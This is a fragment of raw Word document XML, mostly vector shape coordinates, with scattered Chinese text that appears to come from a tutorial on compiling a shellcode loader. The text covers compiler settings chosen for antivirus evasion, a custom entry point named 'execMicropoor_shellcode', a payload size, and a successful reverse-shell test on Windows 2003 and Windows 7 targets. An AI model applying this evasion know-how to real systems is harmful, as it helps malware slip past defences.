      <v:group style="position:absolute;margin-left:89.500pt;margin-top:304.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,6090" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:6090;width:110;height:110" coordorigin="1790,6090" coordsize="110,110" path="m1900,6162l1900,6162,1900,6163,1900,6164,1900,6164,1900,6165,1900,6166,1900,6167,1900,6167,1900,6168,1900,6169,1900,6169,1900,6170,1899,6171,1899,6171,1899,6172,1899,6173,1899,6173,1899,6174,1899,6175,1899,6175,1899,6176,1899,6177,1898,6177,1898,6178,1898,6178,1898,6179,1898,6180,1898,6180,1897,6181,1897,6181,1897,6182,1897,6183,1897,6183,1896,6184,1896,6184,1896,6185,1896,6185,1896,6186,1895,6186,1895,6187,1895,6187,1895,6188,1894,6188,1894,6189,1894,6189,1894,6190,1893,6190,1893,6191,1893,6191,1892,6192,1892,6192,1892,6192,1891,6193,1891,6193,1891,6194,1890,6194,1890,6195,1890,6195,1889,6195,1889,6196,1889,6196,1888,6196,1888,6197,1887,6197,1887,6198,1887,6198,1886,6198,1886,6199,1885,6199,1885,6199,1884,6199,1884,6200,1883,6200,1883,6200,1883,6201,1882,6201,1882,6201,1881,6202,1881,6202,1880,6202,1880,6202,1879,6203,1879,6203,1878,6203,1878,6203,1877,6203,1876,6204,1876,6204,1875,6204,1875,6204,1874,6204,1874,6205,1873,6205,1872,6205,1872,6205,1871,6205,1871,6205,1870,6206,1869,6206,1869,6206,1868,6206,1868,6206,1867,6206,1866,6206,1866,6206,1865,6207,1864,6207,1864,6207,1863,6207,1862,6207,1861,6207,1861,6207,1860,6207,1859,6207,1859,6207,1858,6207,1857,6207,1856,6207,1856,6207,1855,6207,1855,6207,1854,6207,1853,6207,1853,6207,1852,6207,1851,6207,1851,6207,1850,6207,1849,6207,1848,6207,1848,6207,1847,6207,1846,6207,1846,6207,1845,6207,1844,6206,1844,6206,1843,6206,1842,6206,1842,6206,1841,6206,1840,6206,1840,6206,1839,6205,1839,6205,1838,6205,1837,6205,1837,6205,1836,6205,1836,6204,1835,6204,1835,6204,1834,6204,1833,6204,1833,6203,1832,6203,1832,6203,1831,6203,1831,6203,1830,6202,1830,6202,1829,6202,1829,6202,1828,6201,1828,6201,1827,6201,1827,6200,1826,6200,1826,6200,1825,6199,1825,6199,1825,6199,1824,6199,1824,6198,1823,6198,1823,6198,1823,6197,1822,6197,1822,6196,1821,6196,1821,6196,1821,6195,1820,6195,1820,6195,1820,6194,1819,6194,1819,6193,1819,6193,1818,6192,1818,6192,1818,6192,1817,6191,1817,6191,1817,6190,1816,6190,1816,6189,1816,6189,1816,6188,1815,6188,1815,6187,1815,6187,1815,6186,1814,6186,1814,6185,1814,6185,1814,6184,1813,6184,1813,6183,1813,6183,1813,6182,1813,6181,1812,6181,1812,6180,1812,6180,1812,6179,1812,6178,1812,6178,1811,6177,1811,6177,1811,6176,1811,6175,1811,6175,1811,6174,1811,6173,1811,6173,1811,6172,1810,6171,1810,6171,1810,6170,1810,6169,1810,6169,1810,6168,1810,6167,1810,6167,1810,6166,1810,6165,1810,6164,1810,6164,1810,6163,1810,6162,1810,6162,1810,6161,1810,6161,1810,6160,1810,6159,1810,6158,1810,6158,1810,6157,1810,6156,1810,6156,1810,6155,1810,6154,1810,6153,1810,6153,1811,6152,1811,6151,1811,6151,1811,6150,1811,6150,1811,6149,1811,6148,1811,6148,1811,6147,1812,6146,1812,6146,1812,6145,1812,6145,1812,6144,1812,6143,1813,6143,1813,6142,1813,6142,1813,6141,1813,6141,1814,6140,1814,6140,1814,6139,1814,6138,1815,6138,1815,6137,1815,6137,1815,6136,1816,6136,1816,6135,1816,6135,1816,6134,1817,6134,1817,6134,1817,6133,1818,6133,1818,6132,1818,6132,1819,6131,1819,6131,1819,6131,1820,6130,1820,6130,1820,6129,1821,6129,1821,6129,1821,6128,1822,6128,1822,6127,1823,6127,1823,6127,1823,6126,1824,6126,1824,6126,1825,6125,1825,6125,1825,6125,1826,6124,1826,6124,1827,6124,1827,6124,1828,6123,1828,6123,1829,6123,1829,6122,1830,6122,1830,6122,1831,6122,1831,6121,1832,6121,1832,6121,1833,6121,1833,6121,1834,6120,1835,6120,1835,6120,1836,6120,1836,6120,1837,6119,1837,6119,1838,6119,1839,6119,1839,6119,1840,6119,1840,6118,1841,6118,1842,6118,1842,6118,1843,6118,1844,6118,1844,6118,1845,6118,1846,6118,1846,6118,1847,6117,1848,6117,1848,6117,1849,6117,1850,6117,1851,6117,1851,6117,1852,6117,1853,6117,1853,6117,1854,6117,1855,6117,1855,6117,1856,6117,1856,6117,1857,6117,1858,6117,1859,6117,1859,6117,1860,6117,1861,6117,1861,6117,1862,6117,1863,6117,1864,6118,1864,6118,1865,6118,1866,6118,1866,6118,1867,6118,1868,6118,1868,6118,1869,6118,1869,6118,1870,6119,1871,6119,1871,6119,1872,6119,1872,6119,1873,6119,1874,6120,1874,6120,1875,6120,1875,6120,1876,6120,1876,6121,1877,6121,1878,6121,1878,6121,1879,6121,1879,6122,1880,6122,1880,6122,1881,6122,1881,6123,1882,6123,1882,6123,1883,6124,1883,6124,1883,6124,1884,6124,1884,6125,1885,6125,1885,6125,1886,6126,1886,6126,1887,6126,1887,6127,1887,6127,1888,6127,1888,6128,1889,6128,1889,6129,1889,6129,1890,6129,1890,6130,1890,6130,1891,6131,1891,6131,1891,6131,1892,6132,1892,6132,1892,6133,1893,6133,1893,6134,1893,6134,1894,6134,1894,6135,1894,6135,1894,6136,1895,6136,1895,6137,1895,6137,1895,6138,1896,6138,1896,6139,1896,6140,1896,6140,1896,6141,1897,6141,1897,6142,1897,6142,1897,6143,1897,6143,1898,6144,1898,6145,1898,6145,1898,6146,1898,6146,1898,6147,1899,6148,1899,6148,1899,6149,1899,6150,1899,6150,1899,6151,1899,6151,1899,6152,1899,6153,1899,6153,1900,6154,1900,6155,1900,6156,1900,6156,1900,6157,1900,6158,1900,6158,1900,6159,1900,6160,1900,6161,1900,6161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,1900,6162e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:89.500pt;margin-top:325.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,6510" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:6510;width:110;height:110" coordorigin="1790,6510" coordsize="110,110" path="m1900,6582l1900,6582,1900,6583,1900,6584,1900,6585,1900,6585,1900,6586,1900,6587,1900,6587,1900,6588,1900,6589,1900,6590,1900,6590,1899,6591,1899,6592,1899,6592,1899,6593,1899,6594,1899,6594,1899,6595,1899,6596,1899,6596,1899,6597,1898,6597,1898,6598,1898,6599,1898,6599,1898,6600,1898,6600,1897,6601,1897,6602,1897,6602,1897,6603,1897,6603,1896,6604,1896,6604,1896,6605,1896,6605,1896,6606,1895,6606,1895,6607,1895,6607,1895,6608,1894,6608,1894,6609,1894,6609,1894,6610,1893,6610,1893,6611,1893,6611,1892,6612,1892,6612,1892,6613,1891,6613,1891,6613,1891,6614,1890,6614,1890,6615,1890,6615,1889,6616,1889,6616,1889,6616,1888,6617,1888,6617,1887,6617,1887,6618,1887,6618,1886,6618,1886,6619,1885,6619,1885,6619,1884,6620,1884,6620,1883,6620,1883,6621,1883,6621,1882,6621,1882,6621,1881,6622,1881,6622,1880,6622,1880,6623,1879,6623,1879,6623,1878,6623,1878,6623,1877,6624,1876,6624,1876,6624,1875,6624,1875,6624,1874,6625,1874,6625,1873,6625,1872,6625,1872,6625,1871,6626,1871,6626,1870,6626,1869,6626,1869,6626,1868,6626,1868,6626,1867,6626,1866,6627,1866,6627,1865,6627,1864,6627,1864,6627,1863,6627,1862,6627,1861,6627,1861,6627,1860,6627,1859,6627,1859,6627,1858,6627,1857,6627,1856,6627,1856,6627,1855,6627,1855,6627,1854,6627,1853,6627,1853,6627,1852,6627,1851,6627,1851,6627,1850,6627,1849,6627,1848,6627,1848,6627,1847,6627,1846,6627,1846,6627,1845,6627,1844,6627,1844,6627,1843,6626,1842,6626,1842,6626,1841,6626,1840,6626,1840,6626,1839,6626,1839,6626,1838,6625,1837,6625,1837,6625,1836,6625,1836,6625,1835,6624,1835,6624,1834,6624,1833,6624,1833,6624,1832,6623,1832,6623,1831,6623,1831,6623,1830,6623,1830,6622,1829,6622,1829,6622,1828,6621,1828,6621,1827,6621,1827,6621,1826,6620,1826,6620,1825,6620,1825,6619,1825,6619,1824,6619,1824,6618,1823,6618,1823,6618,1823,6617,1822,6617,1822,6617,1821,6616,1821,6616,1821,6616,1820,6615,1820,6615,1820,6614,1819,6614,1819,6613,1819,6613,1818,6613,1818,6612,1818,6612,1817,6611,1817,6611,1817,6610,1816,6610,1816,6609,1816,6609,1816,6608,1815,6608,1815,6607,1815,6607,1815,6606,1814,6606,1814,6605,1814,6605,1814,6604,1813,6604,1813,6603,1813,6603,1813,6602,1813,6602,1812,6601,1812,6600,1812,6600,1812,6599,1812,6599,1812,6598,1811,6597,1811,6597,1811,6596,1811,6596,1811,6595,1811,6594,1811,6594,1811,6593,1811,6592,1810,6592,1810,6591,1810,6590,1810,6590,1810,6589,1810,6588,1810,6587,1810,6587,1810,6586,1810,6585,1810,6585,1810,6584,1810,6583,1810,6582,1810,6582,1810,6582,1810,6581,1810,6580,1810,6579,1810,6579,1810,6578,1810,6577,1810,6576,1810,6576,1810,6575,1810,6574,1810,6574,1810,6573,1811,6572,1811,6572,1811,6571,1811,6570,1811,6570,1811,6569,1811,6568,1811,6568,1811,6567,1812,6567,1812,6566,1812,6565,1812,6565,1812,6564,1812,6564,1813,6563,1813,6562,1813,6562,1813,6561,1813,6561,1814,6560,1814,6560,1814,6559,1814,6559,1815,6558,1815,6558,1815,6557,1815,6557,1816,6556,1816,6556,1816,6555,1816,6555,1817,6554,1817,6554,1817,6553,1818,6553,1818,6552,1818,6552,1819,6552,1819,6551,1819,6551,1820,6550,1820,6550,1820,6550,1821,6549,1821,6549,1821,6548,1822,6548,1822,6548,1823,6547,1823,6547,1823,6547,1824,6546,1824,6546,1825,6546,1825,6545,1825,6545,1826,6545,1826,6544,1827,6544,1827,6544,1828,6543,1828,6543,1829,6543,1829,6543,1830,6542,1830,6542,1831,6542,1831,6542,1832,6541,1832,6541,1833,6541,1833,6541,1834,6541,1835,6540,1835,6540,1836,6540,1836,6540,1837,6540,1837,6539,1838,6539,1839,6539,1839,6539,1840,6539,1840,6539,1841,6539,1842,6538,1842,6538,1843,6538,1844,6538,1844,6538,1845,6538,1846,6538,1846,6538,1847,6538,1848,6538,1848,6538,1849,6537,1850,6537,1851,6537,1851,6537,1852,6537,1853,6537,1853,6537,1854,6537,1855,6537,1855,6537,1856,6537,1856,6537,1857,6537,1858,6537,1859,6537,1859,6537,1860,6537,1861,6537,1861,6538,1862,6538,1863,6538,1864,6538,1864,6538,1865,6538,1866,6538,1866,6538,1867,6538,1868,6538,1868,6538,1869,6539,1869,6539,1870,6539,1871,6539,1871,6539,1872,6539,1872,6539,1873,6540,1874,6540,1874,6540,1875,6540,1875,6540,1876,6541,1876,6541,1877,6541,1878,6541,1878,6541,1879,6542,1879,6542,1880,6542,1880,6542,1881,6543,1881,6543,1882,6543,1882,6543,1883,6544,1883,6544,1883,6544,1884,6545,1884,6545,1885,6545,1885,6546,1886,6546,1886,6546,1887,6547,1887,6547,1887,6547,1888,6548,1888,6548,1889,6548,1889,6549,1889,6549,1890,6550,1890,6550,1890,6550,1891,6551,1891,6551,1891,6552,1892,6552,1892,6552,1892,6553,1893,6553,1893,6554,1893,6554,1894,6555,1894,6555,1894,6556,1894,6556,1895,6557,1895,6557,1895,6558,1895,6558,1896,6559,1896,6559,1896,6560,1896,6560,1896,6561,1897,6561,1897,6562,1897,6562,1897,6563,1897,6564,1898,6564,1898,6565,1898,6565,1898,6566,1898,6567,1898,6567,1899,6568,1899,6568,1899,6569,1899,6570,1899,6570,1899,6571,1899,6572,1899,6572,1899,6573,1899,6574,1900,6574,1900,6575,1900,6576,1900,6576,1900,6577,1900,6578,1900,6579,1900,6579,1900,6580,1900,6581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e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:89.500pt;margin-top:346.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,6930" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:6930;width:110;height:110" coordorigin="1790,6930" coordsize="110,110" path="m1900,7003l1900,7003,1900,7003,1900,7004,1900,7005,1900,7006,1900,7006,1900,7007,1900,7008,1900,7008,1900,7009,1900,7010,1900,7010,1899,7011,1899,7012,1899,7012,1899,7013,1899,7014,1899,7014,1899,7015,1899,7016,1899,7016,1899,7017,1898,7018,1898,7018,1898,7019,1898,7019,1898,7020,1898,7021,1897,7021,1897,7022,1897,7022,1897,7023,1897,7023,1896,7024,1896,7025,1896,7025,1896,7026,1896,7026,1895,7027,1895,7027,1895,7028,1895,7028,1894,7029,1894,7029,1894,7030,1894,7030,1893,7031,1893,7031,1893,7032,1892,7032,1892,7032,1892,7033,1891,7033,1891,7034,1891,7034,1890,7035,1890,7035,1890,7035,1889,7036,1889,7036,1889,7036,1888,7037,1888,7037,1887,7038,1887,7038,1887,7038,1886,7039,1886,7039,1885,7039,1885,7040,1884,7040,1884,7040,1883,7041,1883,7041,1883,7041,1882,7041,1882,7042,1881,7042,1881,7042,1880,7042,1880,7043,1879,7043,1879,7043,1878,7043,1878,7044,1877,7044,1876,7044,1876,7044,1875,7044,1875,7045,1874,7045,1874,7045,1873,7045,1872,7045,1872,7046,1871,7046,1871,7046,1870,7046,1869,7046,1869,7046,1868,7046,1868,7047,1867,7047,1866,7047,1866,7047,1865,7047,1864,7047,1864,7047,1863,7047,1862,7047,1861,7047,1861,7047,1860,7047,1859,7047,1859,7047,1858,7047,1857,7048,1856,7048,1856,7048,1855,7048,1855,7048,1854,7048,1853,7048,1853,7048,1852,7047,1851,7047,1851,7047,1850,7047,1849,7047,1848,7047,1848,7047,1847,7047,1846,7047,1846,7047,1845,7047,1844,7047,1844,7047,1843,7047,1842,7047,1842,7046,1841,7046,1840,7046,1840,7046,1839,7046,1839,7046,1838,7046,1837,7045,1837,7045,1836,7045,1836,7045,1835,7045,1835,7044,1834,7044,1833,7044,1833,7044,1832,7044,1832,7043,1831,7043,1831,7043,1830,7043,1830,7042,1829,7042,1829,7042,1828,7042,1828,7041,1827,7041,1827,7041,1826,7041,1826,7040,1825,7040,1825,7040,1825,7039,1824,7039,1824,7039,1823,7038,1823,7038,1823,7038,1822,7037,1822,7037,1821,7036,1821,7036,1821,7036,1820,7035,1820,7035,1820,7035,1819,7034,1819,7034,1819,7033,1818,7033,1818,7032,1818,7032,1817,7032,1817,7031,1817,7031,1816,7030,1816,7030,1816,7029,1816,7029,1815,7028,1815,7028,1815,7027,1815,7027,1814,7026,1814,7026,1814,7025,1814,7025,1813,7024,1813,7023,1813,7023,1813,7022,1813,7022,1812,7021,1812,7021,1812,7020,1812,7019,1812,7019,1812,7018,1811,7018,1811,7017,1811,7016,1811,7016,1811,7015,1811,7014,1811,7014,1811,7013,1811,7012,1810,7012,1810,7011,1810,7010,1810,7010,1810,7009,1810,7008,1810,7008,1810,7007,1810,7006,1810,7006,1810,7005,1810,7004,1810,7003,1810,7003,1810,7003,1810,7002,1810,7001,1810,7000,1810,7000,1810,6999,1810,6998,1810,6997,1810,6997,1810,6996,1810,6995,1810,6995,1810,6994,1810,6993,1811,6993,1811,6992,1811,6991,1811,6991,1811,6990,1811,6989,1811,6989,1811,6988,1811,6987,1812,6987,1812,6986,1812,6986,1812,6985,1812,6984,1812,6984,1813,6983,1813,6983,1813,6982,1813,6982,1813,6981,1814,6980,1814,6980,1814,6979,1814,6979,1815,6978,1815,6978,1815,6977,1815,6977,1816,6976,1816,6976,1816,6975,1816,6975,1817,6974,1817,6974,1817,6974,1818,6973,1818,6973,1818,6972,1819,6972,1819,6971,1819,6971,1820,6971,1820,6970,1820,6970,1821,6969,1821,6969,1821,6969,1822,6968,1822,6968,1823,6967,1823,6967,1823,6967,1824,6966,1824,6966,1825,6966,1825,6965,1825,6965,1826,6965,1826,6965,1827,6964,1827,6964,1828,6964,1828,6963,1829,6963,1829,6963,1830,6963,1830,6962,1831,6962,1831,6962,1832,6962,1832,6961,1833,6961,1833,6961,1834,6961,1835,6961,1835,6960,1836,6960,1836,6960,1837,6960,1837,6960,1838,6959,1839,6959,1839,6959,1840,6959,1840,6959,1841,6959,1842,6959,1842,6959,1843,6958,1844,6958,1844,6958,1845,6958,1846,6958,1846,6958,1847,6958,1848,6958,1848,6958,1849,6958,1850,6958,1851,6958,1851,6958,1852,6958,1853,6958,1853,6958,1854,6958,1855,6958,1855,6958,1856,6958,1856,6958,1857,6958,1858,6958,1859,6958,1859,6958,1860,6958,1861,6958,1861,6958,1862,6958,1863,6958,1864,6958,1864,6958,1865,6958,1866,6958,1866,6958,1867,6958,1868,6959,1868,6959,1869,6959,1869,6959,1870,6959,1871,6959,1871,6959,1872,6959,1872,6960,1873,6960,1874,6960,1874,6960,1875,6960,1875,6961,1876,6961,1876,6961,1877,6961,1878,6961,1878,6962,1879,6962,1879,6962,1880,6962,1880,6963,1881,6963,1881,6963,1882,6963,1882,6964,1883,6964,1883,6964,1883,6965,1884,6965,1884,6965,1885,6965,1885,6966,1886,6966,1886,6966,1887,6967,1887,6967,1887,6967,1888,6968,1888,6968,1889,6969,1889,6969,1889,6969,1890,6970,1890,6970,1890,6971,1891,6971,1891,6971,1891,6972,1892,6972,1892,6973,1892,6973,1893,6974,1893,6974,1893,6974,1894,6975,1894,6975,1894,6976,1894,6976,1895,6977,1895,6977,1895,6978,1895,6978,1896,6979,1896,6979,1896,6980,1896,6980,1896,6981,1897,6982,1897,6982,1897,6983,1897,6983,1897,6984,1898,6984,1898,6985,1898,6986,1898,6986,1898,6987,1898,6987,1899,6988,1899,6989,1899,6989,1899,6990,1899,6991,1899,6991,1899,6992,1899,6993,1899,6993,1899,6994,1900,6995,1900,6995,1900,6996,1900,6997,1900,6997,1900,6998,1900,6999,1900,7000,1900,7000,1900,7001,1900,7002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,1900,7003e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:400.800pt;width:458.400pt;height:143.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId20" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:584.400pt;width:467.400pt;height:153.60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优化：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在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>优化的过程中，需要确保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性能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稳定性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大小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可塑性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免杀性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非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算法，故优化/01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无</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>使用预编译头，故否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无</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>需调试信息，故否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467.400pt;height:170.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId22" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:300.600pt;width:467.400pt;height:186.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId23" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:548.400pt;width:467.400pt;height:39.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId24" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:648.600pt;width:270.600pt;height:62.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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自定义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入口点：execMicropoor_shellcode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再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>次编译：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p</w:t>
      </w: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ayload大小如下：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4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608字节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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第一次靶机测试：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分别测试Windows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2003，Windws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7，reverse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OK。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104.500pt;width:0.500pt;height:194.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,2090" coordsize="10,3890">
        <v:shape style="position:absolute;left:10390;top:2090;width:10;height:3890" coordorigin="10390,2090" coordsize="10,3890" path="m10402,2095l10402,2095,10402,2095,10402,2095,10402,2095,10402,2095,10402,2095,10402,2096,10402,2096,10402,2096,10402,2097,10402,2097,10402,2098,10402,2099,10402,2100,10402,2101,10402,2103,10402,2104,10402,2106,10402,2108,10402,2111,10402,2113,10402,2116,10402,2120,10402,2123,10402,2127,10402,2131,10402,2136,10402,2140,10402,2146,10402,2151,10402,2157,10402,2164,10402,2171,10402,2178,10402,2186,10402,2194,10402,2203,10402,2212,10402,2222,10402,2232,10402,2243,10402,2254,10402,2266,10402,2278,10402,2292,10402,2305,10402,2320,10402,2335,10402,2350,10402,2366,10402,2383,10402,2401,10402,2419,10402,2438,10402,2458,10402,2479,10402,2500,10402,2522,10402,2545,10402,2569,10402,2593,10402,2619,10402,2645,10402,2672,10402,2700,10402,2728,10402,2758,10402,2789,10402,2820,10402,2853,10402,2886,10402,2921,10402,2956,10402,2992,10402,3030,10402,3068,10402,3108,10402,3148,10402,3190,10402,3232,10402,3276,10402,3321,10402,3367,10402,3414,10402,3462,10402,3512,10402,3562,10402,3614,10402,3667,10402,3721,10402,3777,10402,3833,10402,3891,10402,3950,10402,4011,10402,4073,10402,4136,10402,4200,10402,4266,10402,4333,10402,4402,10402,4472,10402,4543,10402,4616,10402,4690,10402,4765,10402,4842,10402,4921,10402,5001,10402,5082,10402,5165,10402,5250,10402,5336,10402,5423,10402,5512,10402,5603,10402,5695,10402,5789,10402,5885,10402,5982e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:103.500pt;width:449.500pt;height:20.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2070" coordsize="8990,410">
        <v:shape style="position:absolute;left:1490;top:2070;width:8990;height:410" coordorigin="1490,2070" coordsize="8990,410" path="m1510,2095l1510,2095,1510,2095,1510,2095,1510,2095,1510,2095,1510,2095,1511,2095,1512,2095,1512,2095,1514,2095,1515,2095,1517,2095,1519,2095,1521,2095,1524,2095,1528,2095,1532,2095,1536,2095,1541,2095,1546,2095,1552,2095,1559,2095,1566,2095,1575,2095,1583,2095,1593,2095,1603,2095,1615,2095,1627,2095,1640,2095,1654,2095,1668,2095,1684,2095,1701,2095,1719,2095,1738,2095,1758,2095,1780,2095,1802,2095,1826,2095,1851,2095,1877,2095,1904,2095,1933,2095,1963,2095,1995,2095,2028,2095,2063,2095,2099,2095,2136,2095,2175,2095,2216,2095,2259,2095,2303,2095,2348,2095,2396,2095,2445,2095,2496,2095,2549,2095,2604,2095,2660,2095,2719,2095,2779,2095,2841,2095,2906,2095,2972,2095,3041,2095,3112,2095,3184,2095,3259,2095,3336,2095,3416,2095,3498,2095,3582,2095,3668,2095,3757,2095,3848,2095,3941,2095,4037,2095,4136,2095,4236,2095,4340,2095,4446,2095,4555,2095,4666,2095,4780,2095,4897,2095,5017,2095,5139,2095,5264,2095,5392,2095,5523,2095,5657,2095,5793,2095,5933,2095,6076,2095,6222,2095,6370,2095,6522,2095,6677,2095,6835,2095,6997,2095,7161,2095,7329,2095,7500,2095,7675,2095,7853,2095,8034,2095,8219,2095,8407,2095,8598,2095,8793,2095,8992,2095,9194,2095,9400,2095,9609,2095,9823,2095,10039,2095,10260,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2095,10484,2096,10484,2096,10484,2096,10484,2096,10484,2096,10484,2096,10484,2097,10484,2097,10484,2097,10484,2098,10484,2098,10484,2098,10484,2099,10484,2099,10484,2100,10484,2100,10484,2101,10484,2101,10484,2102,10484,2103,10484,2103,10484,2104,10484,2105,10484,2106,10484,2107,10484,2108,10484,2109,10484,2110,10484,2111,10484,2112,10484,2113,10484,2115,10484,2116,10484,2118,10484,2119,10484,2121,10484,2122,10484,2124,10484,2126,10484,2128,10484,2130,10484,2132,10484,2134,10484,2136,10484,2138,10484,2140,10484,2143,10484,2145,10484,2148,10484,2150,10484,2153,10484,2156,10484,2159,10484,2162,10484,2165,10484,2168,10484,2171,10484,2174,10484,2178,10484,2181,10484,2185,10484,2189,10484,2193,10484,2197,10484,2201,10484,2205,10484,2209,10484,2214,10484,2218,10484,2223,10484,2227,10484,2232,10484,2237,10484,2242,10484,2248,10484,2253,10484,2258,10484,2264,10484,2270,10484,2275,10484,2281,10484,2287,10484,2294,10484,2300,10484,2306,10484,2313,10484,2320,10484,2327,10484,2334,10484,2341,10484,2348,10484,2356,10484,2363,10484,2371,10484,2379,10484,2387,10484,2395,10484,2403,10484,2412,10484,2420,10484,2429,10484,2438,10484,2447,10484,2456,10484,2466,10484,2475,10484,2485,10484,2485,10484,2485,10484,2485,10484,2485,10484,2485,10484,2485,10483,2485,10482,2485,10482,2485,10480,2485,10479,2485,10477,2485,10475,2485,10473,2485,10470,2485,10466,2485,10462,2485,10458,2485,10453,2485,10448,2485,10442,2485,10435,2485,10428,2485,10419,2485,10411,2485,10401,2485,10391,2485,10379,2485,10367,2485,10354,2485,10340,2485,10326,2485,10310,2485,10293,2485,10275,2485,10256,2485,10236,2485,10215,2485,10192,2485,10168,2485,10143,2485,10117,2485,10090,2485,10061,2485,10031,2485,9999,2485,9966,2485,9931,2485,9895,2485,9858,2485,9819,2485,9778,2485,9735,2485,9691,2485,9646,2485,9598,2485,9549,2485,9498,2485,9445,2485,9391,2485,9334,2485,9275,2485,9215,2485,9153,2485,9088,2485,9022,2485,8953,2485,8883,2485,8810,2485,8735,2485,8658,2485,8578,2485,8497,2485,8413,2485,8326,2485,8238,2485,8146,2485,8053,2485,7957,2485,7859,2485,7758,2485,7654,2485,7548,2485,7439,2485,7328,2485,7214,2485,7097,2485,6977,2485,6855,2485,6730,2485,6602,2485,6471,2485,6337,2485,6201,2485,6061,2485,5918,2485,5773,2485,5624,2485,5472,2485,5317,2485,5159,2485,4997,2485,4833,2485,4665,2485,4494,2485,4319,2485,4141,2485,3960,2485,3776,2485,3587,2485,3396,2485,3201,2485,3002,2485,2800,2485,2594,2485,2385,2485,2172,2485,1955,2485,1734,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2485,1510,2484,1510,2484,1510,2484,1510,2484,1510,2484,1510,2483,1510,2483,1510,2483,1510,2482,1510,2482,1510,2482,1510,2481,1510,2481,1510,2480,1510,2480,1510,2479,1510,2478,1510,2478,1510,2477,1510,2476,1510,2475,1510,2474,1510,2474,1510,2473,1510,2472,1510,2470,1510,2469,1510,2468,1510,2467,1510,2466,1510,2464,1510,2463,1510,2461,1510,2460,1510,2458,1510,2456,1510,2455,1510,2453,1510,2451,1510,2449,1510,2447,1510,2445,1510,2442,1510,2440,1510,2438,1510,2435,1510,2433,1510,2430,1510,2427,1510,2425,1510,2422,1510,2419,1510,2416,1510,2412,1510,2409,1510,2406,1510,2402,1510,2399,1510,2395,1510,2391,1510,2388,1510,2384,1510,2380,1510,2375,1510,2371,1510,2367,1510,2362,1510,2358,1510,2353,1510,2348,1510,2343,1510,2338,1510,2333,1510,2327,1510,2322,1510,2316,1510,2311,1510,2305,1510,2299,1510,2293,1510,2287,1510,2280,1510,2274,1510,2267,1510,2261,1510,2254,1510,2247,1510,2240,1510,2232,1510,2225,1510,2217,1510,2209,1510,2202,1510,2194,1510,2185,1510,2177,1510,2169,1510,2160,1510,2151,1510,2142,1510,2133,1510,2124,1510,2114,1510,2105,1510,2095e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
